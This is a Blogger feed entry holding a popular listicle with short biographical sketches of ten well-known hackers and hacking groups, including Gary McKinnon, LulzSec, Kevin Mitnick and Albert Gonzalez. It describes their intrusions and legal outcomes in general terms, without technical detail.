&lt;div style=&quot;background-color: white; border: 0px; color: #666666; font-family: Ubuntu, Arial, sans-serif; font-size: 18px; font-stretch: inherit; line-height: 28.8px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;a href=&quot;http://techygang.com/wp-content/uploads/2015/08/pg-6-gary-mckinnon-ap.jpg&quot; style=&quot;border: 0px; color: #3b8dbd; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; text-decoration: none; transition-duration: 0.2s; transition-timing-function: ease; vertical-align: baseline;&quot;&gt;&lt;img alt=&quot;Gary McKinnon , Best Hacker Till Date&quot; class=&quot; size-full wp-image-704 aligncenter&quot; height=&quot;465&quot; src=&quot;http://techygang.com/wp-content/uploads/2015/08/pg-6-gary-mckinnon-ap.jpg&quot; style=&quot;border: 0px; clear: both; display: block; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: auto; line-height: inherit; margin: 18px auto; max-width: 100%; padding: 0px; transition: opacity 0.2s ease; vertical-align: baseline;&quot; width=&quot;620&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #666666; font-family: Ubuntu, Arial, sans-serif; font-size: 18px; font-stretch: inherit; line-height: 28.8px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;&quot;&gt;
Well what this guy says after his arrest is true, then this guy was really stupid to do so and was surely having bad luck.&amp;nbsp;Gary McKinnon was a&amp;nbsp;Scottish system administrator and hacker . &amp;nbsp;He had a curiosity for aliens and&amp;nbsp;&lt;a href=&quot;https://en.wikipedia.org/wiki/Free_energy_suppression_conspiracy_theory&quot; style=&quot;border: 0px; color: #3b8dbd; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; text-decoration: none; transition-duration: 0.2s; transition-timing-function: ease; vertical-align: baseline;&quot; target=&quot;_blank&quot;&gt;Free energy suppression theory&lt;/a&gt;, so to gain information about UFO’s and this theory he hacked into NASA and 97 Military &amp;nbsp;computers&amp;nbsp;, by installing virus and deleting a few files. All the efforts to satisfy his curiosity, but, alas, curiosity killed the cat. It was soon found that McKinnon was guilty of having hacked the military and NASA websites from his girlfriend’s aunt’s house in London. While entering and deleting the files from these websites wasn’t enough, McKinnon thought of shaming the security forces by putting out a notice on the website that said, “Your security is crap.” Well, looks like McKinnon was something, if he could shut down the US Military’s Washington Network of about 2000 computers for 24 hours, making the hack, the biggest military computer hack of all time!&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; border: 0px; color: #444444; font-family: Ubuntu, Arial, sans-serif; font-size: 34px; font-stretch: inherit; font-weight: 400; letter-spacing: -0.7px; line-height: 1.3em; margin: 0px 0px 14px; padding: 0px; text-align: center; vertical-align: baseline; word-wrap: break-word;&quot;&gt;
&lt;span style=&quot;border: 0px; color: maroon; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;2. LulzSec&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #666666; font-family: Ubuntu, Arial, sans-serif; font-size: 18px; font-stretch: inherit; line-height: 28.8px; margin-bottom: 1em; padding: 0px; text-align: center; vertical-align: baseline;&quot;&gt;
&lt;a href=&quot;http://techygang.com/wp-content/uploads/2015/08/Jake-Davis-007.jpg&quot; style=&quot;border: 0px; color: #3b8dbd; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; text-decoration: none; transition-duration: 0.2s; transition-timing-function: ease; vertical-align: baseline;&quot;&gt;&lt;img alt=&quot;LulzSec Best Hacker&quot; class=&quot;alignnone size-full wp-image-705&quot; height=&quot;372&quot; src=&quot;http://techygang.com/wp-content/uploads/2015/08/Jake-Davis-007.jpg&quot; style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: auto; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; transition: opacity 0.2s ease; vertical-align: baseline;&quot; width=&quot;620&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #666666; font-family: Ubuntu, Arial, sans-serif; font-size: 18px; font-stretch: inherit; line-height: 28.8px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;&quot;&gt;
LulzSec or Lulz Security, a high profile, Black Hat hacker group, gained credentials for hacking into Sony, News International, CIA, FBI, Scotland Yard, and several noteworthy accounts. So notorious was the group that when it hacked into News Corporations account, they put across a false report of Rupert Murdoch having passed away. While the group claims to have retired from their vile duties, the motto of the group, “Laughing at your security since 2011!” stays alive. There are assertions of the group having hacked into the websites of the newspapers like The Times and The Sun to post its retirement news. Many, however, claim that this group had taken it upon itself to create awareness about the absence of efficient security against hackers.&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; border: 0px; color: #444444; font-family: Ubuntu, Arial, sans-serif; font-size: 34px; font-stretch: inherit; font-weight: 400; letter-spacing: -0.7px; line-height: 1.3em; margin: 0px 0px 14px; padding: 0px; text-align: center; vertical-align: baseline; word-wrap: break-word;&quot;&gt;
&lt;span style=&quot;border: 0px; color: maroon; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;3. Adrian Lamo&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #666666; font-family: Ubuntu, Arial, sans-serif; font-size: 18px; font-stretch: inherit; line-height: 28.8px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;a href=&quot;http://techygang.com/wp-content/uploads/2015/08/adrianlamo2.jpg&quot; style=&quot;border: 0px; color: #3b8dbd; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; text-decoration: none; transition-duration: 0.2s; transition-timing-function: ease; vertical-align: baseline;&quot;&gt;&lt;img alt=&quot;adrianlamo best hacker in world&quot; class=&quot; size-full wp-image-706 aligncenter&quot; height=&quot;369&quot; src=&quot;http://techygang.com/wp-content/uploads/2015/08/adrianlamo2.jpg&quot; style=&quot;border: 0px; clear: both; display: block; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: auto; line-height: inherit; margin: 18px auto; max-width: 100%; padding: 0px; transition: opacity 0.2s ease; vertical-align: baseline;&quot; width=&quot;632&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #666666; font-family: Ubuntu, Arial, sans-serif; font-size: 18px; font-stretch: inherit; line-height: 28.8px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;&quot;&gt;
Adrian Lamo also known as homeless hacker , decided to switch careers when he realized the potentials of his skills. He became a news when he hacked into Yahoo!, Microsoft, Google, and The New York Times. This, although culminated into his arrest, it later helped him gain the batch of an American Threat Analyst. A guy who would hack into top-notch accounts sitting in the spacious and comforting cafeterias, libraries, internet cafes, soon turned Wikileaks suspect Bradley Manning over to FBI. While Manning was arrested for leaking several hundred sensitive US government documents, Lamo went hiding or should we presume, undercover?&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; border: 0px; color: #444444; font-family: Ubuntu, Arial, sans-serif; font-size: 34px; font-stretch: inherit; font-weight: 400; letter-spacing: -0.7px; line-height: 1.3em; margin: 0px 0px 14px; padding: 0px; text-align: center; vertical-align: baseline; word-wrap: break-word;&quot;&gt;
&lt;span style=&quot;border: 0px; color: maroon; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;4. Mathew Bevan and Richard Pryce&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #666666; font-family: Ubuntu, Arial, sans-serif; font-size: 18px; font-stretch: inherit; line-height: 28.8px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;a href=&quot;http://techygang.com/wp-content/uploads/2015/08/mathew-bevan-richard-pryce.png&quot; style=&quot;border: 0px; color: #3b8dbd; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; text-decoration: none; transition-duration: 0.2s; transition-timing-function: ease; vertical-align: baseline;&quot;&gt;&lt;img alt=&quot;mathew-bevan-richard-pryce hackers&quot; class=&quot;alignnone size-full wp-image-707&quot; height=&quot;345&quot; src=&quot;http://techygang.com/wp-content/uploads/2015/08/mathew-bevan-richard-pryce.png&quot; style=&quot;border: 0px; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: auto; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; transition: opacity 0.2s ease; vertical-align: baseline;&quot; width=&quot;1040&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #666666; font-family: Ubuntu, Arial, sans-serif; font-size: 18px; font-stretch: inherit; line-height: 28.8px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;&quot;&gt;
They are one of few most notorious hackers. Targeting the over-sensitive nerves, what Mathew Bevan along with his alleged partner Richard Pryce did, could have triggered great many issues between USA and North Korea. The duo hacked the US military computers and used it as a means to infiltrate the foreign systems. The crucial contents of Korean Atomic Research Institute were dumped into USAF system. However, the contents were majorly relevant to South Korea and hence, less volatile. But this, nonetheless, could have led to a huge international issue.&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; border: 0px; color: #444444; font-family: Ubuntu, Arial, sans-serif; font-size: 34px; font-stretch: inherit; font-weight: 400; letter-spacing: -0.7px; line-height: 1.3em; margin: 0px 0px 14px; padding: 0px; text-align: center; vertical-align: baseline; word-wrap: break-word;&quot;&gt;
&lt;span style=&quot;border: 0px; color: maroon; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;5. Jonathan James&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #666666; font-family: Ubuntu, Arial, sans-serif; font-size: 18px; font-stretch: inherit; line-height: 28.8px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;a href=&quot;http://techygang.com/wp-content/uploads/2015/08/hck10.jpg&quot; style=&quot;border: 0px; color: #3b8dbd; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; text-decoration: none; transition-duration: 0.2s; transition-timing-function: ease; vertical-align: baseline;&quot;&gt;&lt;img alt=&quot;most wanted hackers 2015&quot; class=&quot; size-full wp-image-709 aligncenter&quot; height=&quot;220&quot; src=&quot;http://techygang.com/wp-content/uploads/2015/08/hck10.jpg&quot; style=&quot;border: 0px; clear: both; display: block; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: auto; line-height: inherit; margin: 18px auto; max-width: 100%; padding: 0px; transition: opacity 0.2s ease; vertical-align: baseline;&quot; width=&quot;206&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #666666; font-family: Ubuntu, Arial, sans-serif; font-size: 18px; font-stretch: inherit; line-height: 28.8px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;&quot;&gt;
The first juvenile to be imprisoned for a cyber-crime at the age of 16, Jonathan James or better known as c0mrade, hacked into Defense Threat Reduction Agency of US department. Further, he installed a sniffer that scrutinized the messages passed on between the DTRA employees. Not only did he keep a check on the messages being passed around, in the process, he collected the passwords and usernames and other such vital details of the employees, and further even stole essential software. All this cost NASA to shut down its system and to pay from its pocket $41,000. c0mrade, however, had a bitter ending as James committed suicide in 2008.&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; border: 0px; color: #444444; font-family: Ubuntu, Arial, sans-serif; font-size: 34px; font-stretch: inherit; font-weight: 400; letter-spacing: -0.7px; line-height: 1.3em; margin: 0px 0px 14px; padding: 0px; text-align: center; vertical-align: baseline; word-wrap: break-word;&quot;&gt;
&lt;span style=&quot;border: 0px; color: maroon; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;6. Kevin Poulsen&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #666666; font-family: Ubuntu, Arial, sans-serif; font-size: 18px; font-stretch: inherit; line-height: 28.8px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;a href=&quot;http://techygang.com/wp-content/uploads/2015/08/Kevin-Poulsen.png&quot; style=&quot;border: 0px; color: #3b8dbd; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; text-decoration: none; transition-duration: 0.2s; transition-timing-function: ease; vertical-align: baseline;&quot;&gt;&lt;img alt=&quot;Kevin-Poulsen best hacker in the world&quot; class=&quot;  wp-image-711 aligncenter&quot; height=&quot;520&quot; src=&quot;http://techygang.com/wp-content/uploads/2015/08/Kevin-Poulsen.png&quot; style=&quot;border: 0px; clear: both; display: block; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: auto; line-height: inherit; margin: 18px auto; max-width: 100%; padding: 0px; transition: opacity 0.2s ease; vertical-align: baseline;&quot; width=&quot;693&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #666666; font-family: Ubuntu, Arial, sans-serif; font-size: 18px; font-stretch: inherit; line-height: 28.8px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;&quot;&gt;
How far would you go to win your dream car or a dream house? How far will you go to win an online contest or a radio show contest? Perhaps, you shall keep trying your luck, unless you are Kevin Poulsen! Poulsen infiltrated a radio shows call-in contest just so he could win a Porsche. Dark Dante, as he was better known, went underground after FBI started pursuing him. He, later, was found guilty of seven counts of mail, wire and computer fraud, money laundering and the likes. What turned out to be rewarding in Dark Dante’s case is – his past crafted his future. Poulsen now serves as a Senior Editor at Wired.&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; border: 0px; color: #444444; font-family: Ubuntu, Arial, sans-serif; font-size: 34px; font-stretch: inherit; font-weight: 400; letter-spacing: -0.7px; line-height: 1.3em; margin: 0px 0px 14px; padding: 0px; text-align: center; vertical-align: baseline; word-wrap: break-word;&quot;&gt;
&lt;span style=&quot;border: 0px; color: maroon; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;7. Kevin Mitnick&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #666666; font-family: Ubuntu, Arial, sans-serif; font-size: 18px; font-stretch: inherit; line-height: 28.8px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;a href=&quot;http://techygang.com/wp-content/uploads/2015/08/Kevin-Mitnick.jpg&quot; style=&quot;border: 0px; color: #3b8dbd; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; text-decoration: none; transition-duration: 0.2s; transition-timing-function: ease; vertical-align: baseline;&quot;&gt;&lt;img alt=&quot;Kevin-Mitnick best hacker in the world&quot; class=&quot; size-full wp-image-712 aligncenter&quot; height=&quot;220&quot; src=&quot;http://techygang.com/wp-content/uploads/2015/08/Kevin-Mitnick.jpg&quot; style=&quot;border: 0px; clear: both; display: block; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: auto; line-height: inherit; margin: 18px auto; max-width: 100%; padding: 0px; transition: opacity 0.2s ease; vertical-align: baseline;&quot; width=&quot;271&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #666666; font-family: Ubuntu, Arial, sans-serif; font-size: 18px; font-stretch: inherit; line-height: 28.8px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;&quot;&gt;
Clad in an Armani suit, when a bespectacled face in his mid-40s smiles at you from the computer screen, you can hardly consider the man a cyber-criminal. Such is the case with Kevin David Mitnick. Once upon a time, the most wanted cyber-criminal of US, now is an affluent entrepreneur. Kevin, who is now a security consultant, was convicted of hacking Nokia, Motorola and Pentagon. He pleaded guilty to seven counts of fraud that included wire fraud, computer fraud and of illegally interception a wire communication. After five years of incarceration that included eight months of solitary confinement, Mitnick now has started afresh. However, his knack with the computers is still reminisced and was even depicted on celluloid in the films Takedown and Freedom Downtown.&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; border: 0px; color: #444444; font-family: Ubuntu, Arial, sans-serif; font-size: 34px; font-stretch: inherit; font-weight: 400; letter-spacing: -0.7px; line-height: 1.3em; margin: 0px 0px 14px; padding: 0px; text-align: center; vertical-align: baseline; word-wrap: break-word;&quot;&gt;
&lt;span style=&quot;border: 0px; color: maroon; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;8. Anonymous&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #666666; font-family: Ubuntu, Arial, sans-serif; font-size: 18px; font-stretch: inherit; line-height: 28.8px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;a href=&quot;http://techygang.com/wp-content/uploads/2015/08/anonymous.jpg&quot; style=&quot;border: 0px; color: #3b8dbd; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; text-decoration: none; transition-duration: 0.2s; transition-timing-function: ease; vertical-align: baseline;&quot;&gt;&lt;img alt=&quot;anonymous Best hacking group ever&quot; class=&quot; size-full wp-image-713 aligncenter&quot; height=&quot;250&quot; src=&quot;http://techygang.com/wp-content/uploads/2015/08/anonymous.jpg&quot; style=&quot;border: 0px; clear: both; display: block; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: auto; line-height: inherit; margin: 18px auto; max-width: 100%; padding: 0px; transition: opacity 0.2s ease; vertical-align: baseline;&quot; width=&quot;628&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #666666; font-family: Ubuntu, Arial, sans-serif; font-size: 18px; font-stretch: inherit; line-height: 28.8px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;&quot;&gt;
The concept of being a “digital Robin Hood” was far from being conceived, but in the computer age, it is very likely that someone somewhere has bagged this title. A “hacktivist group” called Anonymous are known with the penname of being the “digital Robin Hood” amongst its supporters. Identified in public by wearing a Guy Fawkes Masks, Anons, as they are widely known, have publicized themselves by attacking the government, religious and corporate websites. The Vatican, the FBI, the CIA, PayPal, Sony, Mastercard, Visa, Chinese, Israeli, Tunisian, and Ugandan governments have been amongst their targets. Although, Anons have been arguing whether to engage in a serious activism or a mere entertainment, many of the group members have clarified their intent which is to attack internet censorship and control.&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; border: 0px; color: #444444; font-family: Ubuntu, Arial, sans-serif; font-size: 34px; font-stretch: inherit; font-weight: 400; letter-spacing: -0.7px; line-height: 1.3em; margin: 0px 0px 14px; padding: 0px; text-align: center; vertical-align: baseline; word-wrap: break-word;&quot;&gt;
&lt;span style=&quot;border: 0px; color: maroon; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;9. Astra&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #666666; font-family: Ubuntu, Arial, sans-serif; font-size: 18px; font-stretch: inherit; line-height: 28.8px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;a href=&quot;http://techygang.com/wp-content/uploads/2015/08/article-urn-publicid-ap.org-ca767db1b8e0448abb54dec1f7a6eeba-6YUOP35I3HSK2-205_634x435.jpg&quot; style=&quot;border: 0px; color: #3b8dbd; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; text-decoration: none; transition-duration: 0.2s; transition-timing-function: ease; vertical-align: baseline;&quot;&gt;&lt;img alt=&quot;astra best hacker in the world&quot; class=&quot; size-full wp-image-714 aligncenter&quot; height=&quot;435&quot; src=&quot;http://techygang.com/wp-content/uploads/2015/08/article-urn-publicid-ap.org-ca767db1b8e0448abb54dec1f7a6eeba-6YUOP35I3HSK2-205_634x435.jpg&quot; style=&quot;border: 0px; clear: both; display: block; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: auto; line-height: inherit; margin: 18px auto; max-width: 100%; padding: 0px; transition: opacity 0.2s ease; vertical-align: baseline;&quot; width=&quot;634&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #666666; font-family: Ubuntu, Arial, sans-serif; font-size: 18px; font-stretch: inherit; line-height: 28.8px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;&quot;&gt;
Astra, a Sanskrit word for weapon was the penname of a hacker who dealt in the weapon stealing and selling. A 58-year-old Greek Mathematician hacked into the systems of France’s Dassault Group, stole vulnerable weapons technology data and sold it to different countries for five long years. While the real identity of the ASTRA remains untraced, officials have said that he had been wanted since 2002. Astra sold the data to approximately 250 people from around the globe, which cost Dassault $360 millions of damage.&lt;/div&gt;
&lt;h2 style=&quot;background-color: white; border: 0px; color: #444444; font-family: Ubuntu, Arial, sans-serif; font-size: 34px; font-stretch: inherit; font-weight: 400; letter-spacing: -0.7px; line-height: 1.3em; margin: 0px 0px 14px; padding: 0px; text-align: center; vertical-align: baseline; word-wrap: break-word;&quot;&gt;
&lt;span style=&quot;border: 0px; color: maroon; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;&quot;&gt;10. Albert Gonzalez&lt;/span&gt;&lt;/h2&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #666666; font-family: Ubuntu, Arial, sans-serif; font-size: 18px; font-stretch: inherit; line-height: 28.8px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;&quot;&gt;
&lt;a href=&quot;http://techygang.com/wp-content/uploads/2015/08/Albert-gonzalez.jpg&quot; style=&quot;border: 0px; color: #3b8dbd; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; outline: 0px; padding: 0px; text-decoration: none; transition-duration: 0.2s; transition-timing-function: ease; vertical-align: baseline;&quot;&gt;&lt;img alt=&quot;Albert-gonzalez best hacker in the world&quot; class=&quot; size-full wp-image-715 aligncenter&quot; height=&quot;267&quot; src=&quot;http://techygang.com/wp-content/uploads/2015/08/Albert-gonzalez.jpg&quot; style=&quot;border: 0px; clear: both; display: block; font-family: inherit; font-size: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; height: auto; line-height: inherit; margin: 18px auto; max-width: 100%; padding: 0px; transition: opacity 0.2s ease; vertical-align: baseline;&quot; width=&quot;230&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #666666; font-family: Ubuntu, Arial, sans-serif; font-size: 18px; font-stretch: inherit; line-height: 28.8px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;&quot;&gt;
How safe is internet banking? When we browse through the profile of this mastermind, we are certain that one ought to use the World Wide Web with immense care. For two long years, Albert Gonzalez, stole from credit cards of the netizens. This was recorded to be the biggest credit card theft in the history of mankind. He resold approximately 170 million credit cards and ATM numbers. He did so by installing a sniffer and sniffing out the computer data from internal corporate networks. When arrested, Gonzalez was sentenced to 20 years in Federal prison.&lt;/div&gt;
&lt;div style=&quot;background-color: white; border: 0px; color: #666666; font-family: Ubuntu, Arial, sans-serif; font-size: 18px; font-stretch: inherit; line-height: 28.8px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;&quot;&gt;
courtesy : &lt;a href=&quot;http://techygang.com/10-best-hacker-the-world-has-ever-known/&quot; target=&quot;_blank&quot;&gt;www.techygang.com&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://techygang.blogspot.com/feeds/4954061651467689508/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://techygang.blogspot.com/2015/09/10-best-hacker-world-has-ever-known.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/991668941167356653/posts/default/4954061651467689508'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/991668941167356653/posts/default/4954061651467689508'/><link rel='alternate' type='text/html' href='http://techygang.blogspot.com/2015/09/10-best-hacker-world-has-ever-known.html' title='10 Best Hacker The World Has Ever Known.'/><author><name>Vivek Singh</name><uri>http://www.blogger.com/profile/03820533605943035046</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry></feed>